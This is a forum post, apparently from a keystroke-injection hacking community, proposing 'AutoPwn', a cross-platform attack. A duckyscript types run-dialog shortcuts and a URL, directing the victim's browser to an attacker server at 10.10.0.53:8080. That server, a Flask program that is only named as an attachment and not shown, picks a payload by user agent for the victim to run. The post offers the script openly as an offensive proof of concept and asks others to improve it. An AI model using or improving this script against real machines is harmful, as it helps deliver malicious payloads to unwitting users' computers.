Jump to content
sub0

[PAYLOAD] AutoPwn

Recommended Posts

Hello,

I had an idea for a sort of cross platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the targets user agent. This is only a PoC, nothing finalized at all but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript:

DELAY 1000
ALT F2
DELAY 50
GUI SPACE
GUI r
DELAY 50
BACKSPACE
DELAY 100
STRING http://10.10.0.53:8080/
ENTER

This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with windows at all, been years since I used it (I'm a total linux nerd) so my powershell payload is probably terrible. I would welcome any and all improvements, ideas, etc.

Thanks for reading!

- sub0

autopwn.py

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...